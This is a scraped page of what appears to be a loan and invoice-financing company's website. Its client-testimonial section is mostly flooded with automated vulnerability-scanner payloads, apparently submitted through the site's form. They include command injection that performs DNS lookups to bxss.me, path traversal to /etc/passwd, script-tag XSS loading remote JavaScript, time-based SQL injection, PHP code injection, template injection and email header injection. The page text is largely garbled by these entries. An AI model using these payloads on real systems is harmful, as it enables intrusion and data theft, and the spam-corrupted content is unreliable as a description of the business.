fast funding for your business and personal needs

Apply now

fast funding for your business and personal needs

Apply now

fast funding for your business and personal needs

Apply now

Our Services

Invoice Discounting

Turn unpaid invoices into cash
Read More

Salary Loans

Get cash advance against your salary
Read More

Supply Chain Financing

Let us finance your supplies
Read More

Grow Your Business Without the Hassle of Collaterals

Unlock money tied up in invoices through the power of Invoice Discounting in less than 24 hours.

APPLY NOW

Take an Instant Salary Advance directly into your Mobile Money Account or Bank Account

Whether it’s a personal or medical emergency or paying for your child’s school fees, we have got you covered.

APPLY NOW

Easy to get started

HCH Finance makes business funding quick and painless. Apply online and get approved in as fast as 8 hours.

Flexible by design

Use your available credit line when you want, for any business need. Enjoy no long-term contracts or prepayment fees.

Dedicated advisors

Our advisors are available to walk you through the process and help you obtain the funds you need.

Watch the videos to know more about our services

See What Our Clients Have To Say About HCH

We have piece of mind with HCH Financial Services Limited because we are able to have our invoices discount within a few hours. We thank you for pushing us towards the success of our projects.

Shaban Mukasa . JSG Construction Limited

When I had conceded a financial resource defeat, HCH proved what dynamic financial redemption means. I am now comfortable to negotiate and secure any contract and I deliver on time.

Felix Kakaire . Bullen Construction

HCH is here to help us in the execution of work, I have just started using them. Not too much red tape, the service is quick, and convenient.

Paddy Mutyaba . Antikale Entertainment Limited

Am trying to get you but i have failed please call me back

Kyeyamwa musa . Konge

20

RdkesOdP . 1

20

RdkesOdP . 1

20

RdkesOdP . 1

555

RdkesOdP . 1

555

RdkesOdP . 1

555

RdkesOdP . 1

20

RdkesOdP . 1

20

response.write(9009802*9274942) . 1

20

'+response.write(9009802*9274942)+' . 1

20

"+response.write(9009802*9274942)+" . 1

20

RdkesOdP . response.write(9404928*9834744)

20

RdkesOdP . '+response.write(9404928*9834744)+'

20

RdkesOdP . "+response.write(9404928*9834744)+"

response.write(9001753*9628540)

RdkesOdP . 1

'+response.write(9001753*9628540)+'

RdkesOdP . 1

20

RdkesOdP . 1

"+response.write(9001753*9628540)+"

RdkesOdP . 1

20

echo vqwlwl$()\ kagtka\nz^xyu||a #' &echo vqwlwl$()\ kagtka\nz^xyu||a #|" &echo vqwlwl$()\ kagtka\nz^xyu||a # . 1

20

&echo smurys$()\ bizitq\nz^xyu||a #' &echo smurys$()\ bizitq\nz^xyu||a #|" &echo smurys$()\ bizitq\nz^xyu||a # . 1

20

|echo namzsu$()\ xkqamw\nz^xyu||a #' |echo namzsu$()\ xkqamw\nz^xyu||a #|" |echo namzsu$()\ xkqamw\nz^xyu||a # . 1

20

(nslookup hitwszasghgwf46341.bxss.me||perl -e "gethostbyname('hitwszasghgwf46341.bxss.me')") . 1

20

$(nslookup hitojmfcpvthe968ec.bxss.me||perl -e "gethostbyname('hitojmfcpvthe968ec.bxss.me')") . 1

20

&(nslookup hitdombrbrlurda737.bxss.me||perl -e "gethostbyname('hitdombrbrlurda737.bxss.me')")&'\"`0&(nslookup hitdombrbrlurda737.bxss.me||perl -e "gethostbyname('hitdombrbrlurda737.bxss.me')")&`' . 1

20

|(nslookup hitssthucxrmdd2253.bxss.me||perl -e "gethostbyname('hitssthucxrmdd2253.bxss.me')") . 1

20

`(nslookup hitpvbohlnfpr1a985.bxss.me||perl -e "gethostbyname('hitpvbohlnfpr1a985.bxss.me')")` . 1

20

RdkesOdP . echo mxqsmp$()\ lrgzuh\nz^xyu||a #' &echo mxqsmp$()\ lrgzuh\nz^xyu||a #|" &echo mxqsmp$()\ lrgzuh\nz^xyu||a #

20

RdkesOdP . &echo scqvfn$()\ vtozlh\nz^xyu||a #' &echo scqvfn$()\ vtozlh\nz^xyu||a #|" &echo scqvfn$()\ vtozlh\nz^xyu||a #

20

RdkesOdP . |echo eiecsl$()\ ytprjl\nz^xyu||a #' |echo eiecsl$()\ ytprjl\nz^xyu||a #|" |echo eiecsl$()\ ytprjl\nz^xyu||a #

20

RdkesOdP . (nslookup hitajnykvpynud008d.bxss.me||perl -e "gethostbyname('hitajnykvpynud008d.bxss.me')")

20

RdkesOdP . $(nslookup hitovbjenudnu95fce.bxss.me||perl -e "gethostbyname('hitovbjenudnu95fce.bxss.me')")

20

RdkesOdP . &(nslookup hitxzadsqtkkce3584.bxss.me||perl -e "gethostbyname('hitxzadsqtkkce3584.bxss.me')")&'\"`0&(nslookup hitxzadsqtkkce3584.bxss.me||perl -e "gethostbyname('hitxzadsqtkkce3584.bxss.me')")&`'

20

RdkesOdP . |(nslookup hitqlmjeykgdie1cef.bxss.me||perl -e "gethostbyname('hitqlmjeykgdie1cef.bxss.me')")

20

RdkesOdP . `(nslookup hitpogwuizfxp957fb.bxss.me||perl -e "gethostbyname('hitpogwuizfxp957fb.bxss.me')")`

echo qswggf$()\ ujajtd\nz^xyu||a #' &echo qswggf$()\ ujajtd\nz^xyu||a #|" &echo qswggf$()\ ujajtd\nz^xyu||a #

RdkesOdP . 1

&echo ndldqb$()\ wzilif\nz^xyu||a #' &echo ndldqb$()\ wzilif\nz^xyu||a #|" &echo ndldqb$()\ wzilif\nz^xyu||a #

RdkesOdP . 1

20

zFmKjiTD . 1

|echo ckxpwi$()\ rrshjq\nz^xyu||a #' |echo ckxpwi$()\ rrshjq\nz^xyu||a #|" |echo ckxpwi$()\ rrshjq\nz^xyu||a #

RdkesOdP . 1

20

RdkesOdP . FOW2gDoZ

(nslookup hitrxkalwclin95483.bxss.me||perl -e "gethostbyname('hitrxkalwclin95483.bxss.me')")

RdkesOdP . 1

Biuye52c

RdkesOdP . 1

$(nslookup hitpkztaonezleeec7.bxss.me||perl -e "gethostbyname('hitpkztaonezleeec7.bxss.me')")

RdkesOdP . 1

&(nslookup hitxrbanusnvle10ff.bxss.me||perl -e "gethostbyname('hitxrbanusnvle10ff.bxss.me')")&'\"`0&(nslookup hitxrbanusnvle10ff.bxss.me||perl -e "gethostbyname('hitxrbanusnvle10ff.bxss.me')")&`'

RdkesOdP . 1

20

RdkesOdP . 1

|(nslookup hitshunmdinzz60ef9.bxss.me||perl -e "gethostbyname('hitshunmdinzz60ef9.bxss.me')")

RdkesOdP . 1

`(nslookup hityhvflopsoodce7f.bxss.me||perl -e "gethostbyname('hityhvflopsoodce7f.bxss.me')")`

RdkesOdP . 1

;(nslookup hitjgygzmymcp6c737.bxss.me||perl -e "gethostbyname('hitjgygzmymcp6c737.bxss.me')")|(nslookup hitjgygzmymcp6c737.bxss.me||perl -e "gethostbyname('hitjgygzmymcp6c737.bxss.me')")&(nslookup hitjgygzmymcp6c737.bxss.me||perl -e "gethostbyname('hitjgygzmymcp6c737.bxss.me')")

RdkesOdP . 1

20

../../../../../../../../../../../../../../etc/passwd . 1

20

../../../../../../../../../../../../../../windows/win.ini . 1

20

RdkesOdP . 1

20

../RdkesOdP . 1

20

RdkesOdP . ../../../../../../../../../../../../../../etc/passwd

20

RdkesOdP . ../../../../../../../../../../../../../../windows/win.ini

20

RdkesOdP . 1

20

RdkesOdP . ../1

../../../../../../../../../../../../../../etc/passwd

RdkesOdP . 1

../../../../../../../../../../../../../../windows/win.ini

RdkesOdP . 1

20

RdkesOdP . 1

../20

RdkesOdP . 1

20

'" . 1

20

<!-- . 1

20

RdkesOdP . '"

20

RdkesOdP . <!--

'"

RdkesOdP . 1

20

RdkesOdP'"()&%<acx><ScRiPt >fcBu(9681)</ScRiPt> . 1

<!--

RdkesOdP . 1

20

'"()&%<acx><ScRiPt >fcBu(9241)</ScRiPt> . 1

20

RdkesOdP&n971087=v979577 . 1

20

RdkesOdP9319972 . 1

20

RdkesOdP . 1&n952245=v916775

20&n974940=v908033

RdkesOdP . 1

20

acu1667%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca1667 . 1

20

acux5026%C0%BEz1%C0%BCz2a%90bcxuca5026 . 1

20

/xfs.bxss.me . 1

20

RdkesOdP . /xfs.bxss.me

20

<%={{={@{#{${acx}}%> . 1

20

RdkesOdP%0abcc:009247.198-2314.198.d6bd8.19253.2@bxss.me . 1

/xfs.bxss.me

RdkesOdP . 1

20

RdkesOdP . 1

20

to@example.com>%0d%0abcc:009247.198-2315.198.d6bd8.19253.2@bxss.me . 1

20

RdkesOdP<esi:include src="http://bxss.me/rpb.png"/> . 1

20

RdkesOdP . 1%0abcc:009247.198-2316.198.d6bd8.19253.2@bxss.me

20

<th:t="${acx}#foreach . 1

20

RdkesOdP . 1<esi:include src="http://bxss.me/rpb.png"/>

20

RdkesOdP . to@example.com>%0d%0abcc:009247.198-2317.198.d6bd8.19253.2@bxss.me

20<esi:include src="http://bxss.me/rpb.png"/>

RdkesOdP . 1

20

RdkesOdP . 1

20%0abcc:009247.198-2318.198.d6bd8.19253.2@bxss.me

RdkesOdP . 1

to@example.com>%0d%0abcc:009247.198-2319.198.d6bd8.19253.2@bxss.me

RdkesOdP . 1

20

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%> . 1

20

RdkesOdP . 1

20

${9999104+9999952} . 1

20

acx{{98991*97996}}xca . 1

20

RdkesOdP . ${9999468+9999775}

${9999411+10000096}

RdkesOdP . 1

20

acx[[${98991*97996}]]xca . 1

20

http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg . 1

20

acx__${98991*97996}__::.x . 1

20

YklYNElVY2Q= . 1

20

1some_inexistent_file_with_long_name%00.jpg . 1

20

Http://bxss.me/t/fit.txt . 1

20

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o") . 1

20

http://bxss.me/t/fit.txt%3F.jpg . 1

20

HttP://bxss.me/t/xss.html?%00 . 1

20

bxss.me . 1

20

) . 1

20

RdkesOdP . http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

20

RdkesOdP<ScRiPt >fcBu(9778)</ScRiPt> . 1

20

bxss.me/t/xss.html?%00 . 1

20

RdkesOdP . HttP://bxss.me/t/xss.html?%00

20

RdkesOdP . 1some_inexistent_file_with_long_name%00.jpg

20

!(()&&!|*|*| . 1

20

RdkesOdP<WQ7LZK>NHYRC[!+!]</WQ7LZK> . 1

20

^(#$!@#$)(()))****** . 1

20

RdkesOdP . bxss.me/t/xss.html?%00

20

RdkesOdP . Http://bxss.me/t/fit.txt

20

RdkesOdP<script>fcBu(9284)</script> . 1

20

RdkesOdP . http://bxss.me/t/fit.txt%3F.jpg

HttP://bxss.me/t/xss.html?%00

RdkesOdP . 1

20

RdkesOdP . )

20

RdkesOdP . bxss.me

20

RdkesOdP . !(()&&!|*|*|

20

RdkesOdP%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%66%63%42%75%28%39%31%35%34%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E . 1

bxss.me/t/xss.html?%00

RdkesOdP . 1

20

"+"A".concat(70-3).concat(22*4).concat(111).concat(72).concat(97).concat(71)+(require"socket" Socket.gethostbyname("hitzr"+"vhjwulnlc7dc2.bxss.me.")[3].to_s)+" . 1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

RdkesOdP . 1

20

RdkesOdP . ^(#$!@#$)(()))******

20

RdkesOdP<ScRiPt >fcBu(9449)</ScRiPt> . 1

1some_inexistent_file_with_long_name%00.jpg

RdkesOdP . 1

)

RdkesOdP . 1

20

'+'A'.concat(70-3).concat(22*4).concat(102).concat(71).concat(99).concat(82)+(require'socket' Socket.gethostbyname('hitdx'+'adskhuvhcea96.bxss.me.')[3].to_s)+' . 1

20

))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) . 1

!(()&&!|*|*|

RdkesOdP . 1

Http://bxss.me/t/fit.txt

RdkesOdP . 1

20

RdkesOdP<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9119></ScRiPt> . 1

20

RdkesOdP . "+"A".concat(70-3).concat(22*4).concat(107).concat(87).concat(114).concat(80)+(require"socket" Socket.gethostbyname("hitmb"+"skxhtufa71632.bxss.me.")[3].to_s)+"

20

RdkesOdP . )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://bxss.me/t/fit.txt%3F.jpg

RdkesOdP . 1

20

RdkesOdP . '+'A'.concat(70-3).concat(22*4).concat(110).concat(72).concat(101).concat(83)+(require'socket' Socket.gethostbyname('hittr'+'egdldagi88646.bxss.me.')[3].to_s)+'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

RdkesOdP . 1

20

RdkesOdP<ScRiPt >fcBu(9225)</ScRiPt> . 1

20

RdkesOdP . 1

^(#$!@#$)(()))******

RdkesOdP . 1

"+"A".concat(70-3).concat(22*4).concat(101).concat(88).concat(119).concat(86)+(require"socket" Socket.gethostbyname("hitrx"+"vjcxpaok50720.bxss.me.")[3].to_s)+"

RdkesOdP . 1

bxss.me

RdkesOdP . 1

'+'A'.concat(70-3).concat(22*4).concat(114).concat(74).concat(100).concat(68)+(require'socket' Socket.gethostbyname('hitta'+'scnofkgk70ac8.bxss.me.')[3].to_s)+'

RdkesOdP . 1

20

'.gethostbyname(lc('hitne'.'ggconxqlae3e1.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(80).chr(120).chr(73).' . 1

20

".gethostbyname(lc("hitcq"."ywygvrdy32b0f.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(77).chr(110).chr(80)." . 1

20

RdkesOdP . '.gethostbyname(lc('hitpe'.'zcczgzny99a02.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(80).chr(121).chr(87).'

20

RdkesOdP . 1'"()&%<acx><ScRiPt >fcBu(9873)</ScRiPt>

20

RdkesOdP . ".gethostbyname(lc("hitzr"."rpuwsfko94d09.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(65).chr(112).chr(80)."

20

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); . 1

'.gethostbyname(lc('hitgr'.'qedicvhdf3a33.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(90).chr(113).chr(65).'

RdkesOdP . 1

20

RdkesOdP . 1

20

RdkesOdP . '"()&%<acx><ScRiPt >fcBu(9257)</ScRiPt>

".gethostbyname(lc("hitfx"."brpptgbv87364.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(84).chr(120).chr(68)."

RdkesOdP . 1

20

';print(md5(31337));$a=' . 1

20

RdkesOdP . 19555633

20

";print(md5(31337));$a=" . 1

20

${@print(md5(31337))} . 1

20

RdkesOdP . acu1618%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca1618

20

${@print(md5(31337))}\ . 1

20

RdkesOdP . acux5129%C0%BEz1%C0%BCz2a%90bcxuca5129

20

'.print(md5(31337)).' . 1

20

RdkesOdP . ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

20

RdkesOdP . <%={{={@{#{${acx}}%>

20

RdkesOdP . ';print(md5(31337));$a='

20

RdkesOdP . ";print(md5(31337));$a="

20

RdkesOdP . 1

20

RdkesOdP . ${@print(md5(31337))}

20

RdkesOdP . <th:t="${acx}#foreach

20

RdkesOdP . ${@print(md5(31337))}\

20

Y71h4pG3 . 1

20

RdkesOdP . 1

20

RdkesOdP . '.print(md5(31337)).'

20

-1 OR 2+376-376-1=0+0+0+1 -- . 1

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

RdkesOdP . 1

20

-1 OR 2+400-400-1=0+0+0+1 . 1

20

RdkesOdP . 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

';print(md5(31337));$a='

RdkesOdP . 1

20

-1' OR 2+120-120-1=0+0+0+1 -- . 1

";print(md5(31337));$a="

RdkesOdP . 1

20

-1' OR 2+722-722-1=0+0+0+1 or 'GIJ3bAaM'=' . 1

20

RdkesOdP . 1

20

-1" OR 2+199-199-1=0+0+0+1 -- . 1

${@print(md5(31337))}

RdkesOdP . 1

${@print(md5(31337))}\

RdkesOdP . 1

20

RdkesOdP . acx{{98991*97996}}xca

'.print(md5(31337)).'

RdkesOdP . 1

20

RdkesOdP . acx[[${98991*97996}]]xca

20

RdkesOdP . acx__${98991*97996}__::.x

20

if(now()=sysdate(),sleep(15),0) . 1

20

RdkesOdP . "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

20

RdkesOdP . 1<ScRiPt >fcBu(9871)</ScRiPt>

20

RdkesOdP . 1<WZLRTA>SYRCG[!+!]</WZLRTA>

20

RdkesOdP . 1<script>fcBu(9180)</script>

20

RdkesOdP . 1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%66%63%42%75%28%39%34%34%39%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

20

RdkesOdP . 1<ScRiPt >fcBu(9830)</ScRiPt>

20

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z . 1

20

RdkesOdP . 1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9023></ScRiPt>

20

RdkesOdP . 1<ScRiPt >fcBu(9719)</ScRiPt>

20'"()&%<acx><ScRiPt >fcBu(9498)</ScRiPt>

RdkesOdP . 1

20

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z . 1

'"()&%<acx><ScRiPt >fcBu(9512)</ScRiPt>

RdkesOdP . 1

209010964

RdkesOdP . 1

acu2464%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca2464

RdkesOdP . 1

acux7001%C0%BEz1%C0%BCz2a%90bcxuca7001

RdkesOdP . 1

<%={{={@{#{${acx}}%>

RdkesOdP . 1

20

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ . 1

20

RdkesOdP . 1

<th:t="${acx}#foreach

RdkesOdP . 1

20

RdkesOdP . 1

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

RdkesOdP . 1

20

RdkesOdP . 1

20

1 waitfor delay '0:0:15' -- . 1

acx{{98991*97996}}xca

RdkesOdP . 1

acx[[${98991*97996}]]xca

RdkesOdP . 1

acx__${98991*97996}__::.x

RdkesOdP . 1

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

RdkesOdP . 1

20<ScRiPt >fcBu(9617)</ScRiPt>

RdkesOdP . 1

20<W7IGKW>YPBT2[!+!]</W7IGKW>

RdkesOdP . 1

20

KSRjA5G1'; waitfor delay '0:0:15' -- . 1

20<script>fcBu(9320)</script>

RdkesOdP . 1

20%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%66%63%42%75%28%39%31%30%35%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

RdkesOdP . 1

20<ScRiPt >fcBu(9040)</ScRiPt>

RdkesOdP . 1

20

kS9I6fEv' OR 275=(SELECT 275 FROM PG_SLEEP(15))-- . 1

20<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9471></ScRiPt>

RdkesOdP . 1

20<ScRiPt >fcBu(9757)</ScRiPt>

RdkesOdP . 1

20

jIkpWJoQ') OR 192=(SELECT 192 FROM PG_SLEEP(15))-- . 1

20

nNcdiNvq')) OR 997=(SELECT 997 FROM PG_SLEEP(15))-- . 1

20

RdkesOdP'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' . 1

20

1'" . 1

20

@@1Ud8u . 1

20

RdkesOdP . 1

20

RdkesOdP . 1

20

RdkesOdP . HwAjQHDq

20

RdkesOdP . -1 OR 2+101-101-1=0+0+0+1 --

20

RdkesOdP . -1 OR 2+437-437-1=0+0+0+1

20

RdkesOdP . -1' OR 2+558-558-1=0+0+0+1 --

20

RdkesOdP . -1' OR 2+311-311-1=0+0+0+1 or 'uZuZ70aM'='

20

RdkesOdP . -1" OR 2+114-114-1=0+0+0+1 --

20

RdkesOdP . if(now()=sysdate(),sleep(15),0)

20

RdkesOdP . 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

20

RdkesOdP . 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

20

RdkesOdP . (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

20

RdkesOdP . -1; waitfor delay '0:0:15' --

20

RdkesOdP . -1); waitfor delay '0:0:15' --

20

RdkesOdP . 1 waitfor delay '0:0:15' --

20

RdkesOdP . 2nMLo3Qb'; waitfor delay '0:0:15' --

20

RdkesOdP . -5 OR 484=(SELECT 484 FROM PG_SLEEP(15))--

20

RdkesOdP . -5) OR 869=(SELECT 869 FROM PG_SLEEP(15))--

20

RdkesOdP . -1)) OR 217=(SELECT 217 FROM PG_SLEEP(15))--

20

RdkesOdP . 23AnFfhf' OR 765=(SELECT 765 FROM PG_SLEEP(15))--

20

RdkesOdP . Dt0QrDpI') OR 461=(SELECT 461 FROM PG_SLEEP(15))--

20

RdkesOdP . Nz51rONQ')) OR 970=(SELECT 970 FROM PG_SLEEP(15))--

20

RdkesOdP . 1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

20

RdkesOdP . 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

20

RdkesOdP . 1'"

20

RdkesOdP . @@ZNcvp

20

RdkesOdP . 1

20

RdkesOdP . 1

t3M1FGAw

RdkesOdP . 1

-1 OR 2+922-922-1=0+0+0+1 --

RdkesOdP . 1

-1 OR 2+430-430-1=0+0+0+1

RdkesOdP . 1

-1' OR 2+469-469-1=0+0+0+1 --

RdkesOdP . 1

-1' OR 2+473-473-1=0+0+0+1 or 'w0aIOv5W'='

RdkesOdP . 1

-1" OR 2+159-159-1=0+0+0+1 --

RdkesOdP . 1

if(now()=sysdate(),sleep(15),0)

RdkesOdP . 1

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

RdkesOdP . 1

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

RdkesOdP . 1

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

RdkesOdP . 1

-1; waitfor delay '0:0:15' --

RdkesOdP . 1

-1); waitfor delay '0:0:15' --

RdkesOdP . 1

1 waitfor delay '0:0:15' --

RdkesOdP . 1

Uv4ELJdB'; waitfor delay '0:0:15' --

RdkesOdP . 1

-5 OR 534=(SELECT 534 FROM PG_SLEEP(15))--

RdkesOdP . 1

-5) OR 871=(SELECT 871 FROM PG_SLEEP(15))--

RdkesOdP . 1

-1)) OR 606=(SELECT 606 FROM PG_SLEEP(15))--

RdkesOdP . 1

QjORSNfO' OR 736=(SELECT 736 FROM PG_SLEEP(15))--

RdkesOdP . 1

CxoKLzem') OR 314=(SELECT 314 FROM PG_SLEEP(15))--

RdkesOdP . 1

PVMC4Ts0')) OR 64=(SELECT 64 FROM PG_SLEEP(15))--

RdkesOdP . 1

20*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

RdkesOdP . 1

20'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

RdkesOdP . 1

1'"

RdkesOdP . 1

@@g5IIU

RdkesOdP . 1

20

RdkesOdP . 1

20

RdkesOdP . 1

20

RdkesOdP . 1

20

RdkesOdP . 1

20

RdkesOdP . 1

(nslookup hitnusxizzxhz66e15.bxss.me||perl -e "gethostbyname('hitnusxizzxhz66e15.bxss.me')")

RdkesOdP . 1

20

RdkesOdP . '"()&%<acx><ScRiPt >6pI9(9324)</ScRiPt>

20

to@example.com>%0d%0abcc:009247.198-11815.198.03cc7.19253.2@bxss.me . 1

20

/xfs.bxss.me . 1

$(nslookup hitfiwxbernrt7abfa.bxss.me||perl -e "gethostbyname('hitfiwxbernrt7abfa.bxss.me')")

RdkesOdP . 1

20

RdkesOdP . 1%0abcc:009247.198-11816.198.03cc7.19253.2@bxss.me

20

RdkesOdP . /xfs.bxss.me

&(nslookup hittorjuuadie6ef4f.bxss.me||perl -e "gethostbyname('hittorjuuadie6ef4f.bxss.me')")&'\"`0&(nslookup hittorjuuadie6ef4f.bxss.me||perl -e "gethostbyname('hittorjuuadie6ef4f.bxss.me')")&`'

RdkesOdP . 1

20

RdkesOdP . 19016102

20

RdkesOdP . to@example.com>%0d%0abcc:009247.198-11817.198.03cc7.19253.2@bxss.me

/xfs.bxss.me

RdkesOdP . 1

|(nslookup hitvriicbioina1548.bxss.me||perl -e "gethostbyname('hitvriicbioina1548.bxss.me')")

RdkesOdP . 1

20%0abcc:009247.198-11818.198.03cc7.19253.2@bxss.me

RdkesOdP . 1

`(nslookup hitgxugtapvjkd996e.bxss.me||perl -e "gethostbyname('hitgxugtapvjkd996e.bxss.me')")`

RdkesOdP . 1

20

RdkesOdP<esi:include src="http://bxss.me/rpb.png"/> . 1

to@example.com>%0d%0abcc:009247.198-11819.198.03cc7.19253.2@bxss.me

RdkesOdP . 1

20

RdkesOdP . acu3318%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca3318

;(nslookup hitlvvlgghpwvb8141.bxss.me||perl -e "gethostbyname('hitlvvlgghpwvb8141.bxss.me')")|(nslookup hitlvvlgghpwvb8141.bxss.me||perl -e "gethostbyname('hitlvvlgghpwvb8141.bxss.me')")&(nslookup hitlvvlgghpwvb8141.bxss.me||perl -e "gethostbyname('hitlvvlgghpwvb8141.bxss.me')")

RdkesOdP . 1

20

RdkesOdP . 1<esi:include src="http://bxss.me/rpb.png"/>

20

${10000002+9999331} . 1

20<esi:include src="http://bxss.me/rpb.png"/>

RdkesOdP . 1

20

RdkesOdP . acux9180%C0%BEz1%C0%BCz2a%90bcxuca9180

20

RdkesOdP . ${9999888+9999078}

${10000059+9999852}

RdkesOdP . 1

20

RdkesOdP . <%={{={@{#{${acx}}%>

20

MzZweENEZVA= . 1

20

http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg . 1

20

RdkesOdP . 1

20

1some_inexistent_file_with_long_name%00.jpg . 1

20

) . 1

20

HttP://bxss.me/t/xss.html?%00 . 1

20

RdkesOdP . <th:t="${acx}#foreach

20

!(()&&!|*|*| . 1

20

Http://bxss.me/t/fit.txt . 1

20

bxss.me/t/xss.html?%00 . 1

20

^(#$!@#$)(()))****** . 1

20

http://bxss.me/t/fit.txt%3F.jpg . 1

20

RdkesOdP . HttP://bxss.me/t/xss.html?%00

20

RdkesOdP . 1

20

RdkesOdP . )

20

bxss.me . 1

20

RdkesOdP . bxss.me/t/xss.html?%00

20

RdkesOdP . !(()&&!|*|*|

20

RdkesOdP . http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

HttP://bxss.me/t/xss.html?%00

RdkesOdP . 1

20

RdkesOdP . 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

20

RdkesOdP . ^(#$!@#$)(()))******

20

RdkesOdP . 1some_inexistent_file_with_long_name%00.jpg

bxss.me/t/xss.html?%00

RdkesOdP . 1

)

RdkesOdP . 1

20

RdkesOdP . Http://bxss.me/t/fit.txt

20

RdkesOdP . 1

!(()&&!|*|*|

RdkesOdP . 1

20

RdkesOdP . http://bxss.me/t/fit.txt%3F.jpg

^(#$!@#$)(()))******

RdkesOdP . 1

20

RdkesOdP . bxss.me

20

"+"A".concat(70-3).concat(22*4).concat(116).concat(84).concat(114).concat(76)+(require"socket" Socket.gethostbyname("hitfj"+"ztphccsya86bb.bxss.me.")[3].to_s)+" . 1

20

RdkesOdP . acx{{98991*97996}}xca

http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

RdkesOdP . 1

20

'+'A'.concat(70-3).concat(22*4).concat(101).concat(83).concat(99).concat(70)+(require'socket' Socket.gethostbyname('hitmp'+'bljaghzp267d5.bxss.me.')[3].to_s)+' . 1

20

))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) . 1

1some_inexistent_file_with_long_name%00.jpg

RdkesOdP . 1

20

RdkesOdP . "+"A".concat(70-3).concat(22*4).concat(98).concat(86).concat(112).concat(82)+(require"socket" Socket.gethostbyname("hitsd"+"hlimznxxa7575.bxss.me.")[3].to_s)+"

20

RdkesOdP . acx[[${98991*97996}]]xca

20

RdkesOdP . )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Http://bxss.me/t/fit.txt

RdkesOdP . 1

20

RdkesOdP . '+'A'.concat(70-3).concat(22*4).concat(117).concat(68).concat(102).concat(74)+(require'socket' Socket.gethostbyname('hitbt'+'vpnsfjpl4aba3.bxss.me.')[3].to_s)+'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

RdkesOdP . 1

http://bxss.me/t/fit.txt%3F.jpg

RdkesOdP . 1

"+"A".concat(70-3).concat(22*4).concat(101).concat(80).concat(118).concat(90)+(require"socket" Socket.gethostbyname("hituc"+"gmfdhpuo9fd3f.bxss.me.")[3].to_s)+"

RdkesOdP . 1

bxss.me

RdkesOdP . 1

20

RdkesOdP . acx__${98991*97996}__::.x

'+'A'.concat(70-3).concat(22*4).concat(111).concat(80).concat(122).concat(68)+(require'socket' Socket.gethostbyname('hittx'+'ygggrwmh90d95.bxss.me.')[3].to_s)+'

RdkesOdP . 1

20

'.gethostbyname(lc('hitmh'.'wrhgdpow25e6f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(81).chr(106).chr(70).' . 1

20

RdkesOdP . "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

20

".gethostbyname(lc("hitoj"."ghpkvbzf5b3af.bxss.me."))."A".chr(67).chr(hex("58")).chr(117).chr(86).chr(99).chr(84)." . 1

20

RdkesOdP . '.gethostbyname(lc('hitjz'.'fcmcxktoa01c6.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(83).chr(117).chr(82).'

20

RdkesOdP . 1<ScRiPt >6pI9(9724)</ScRiPt>

20

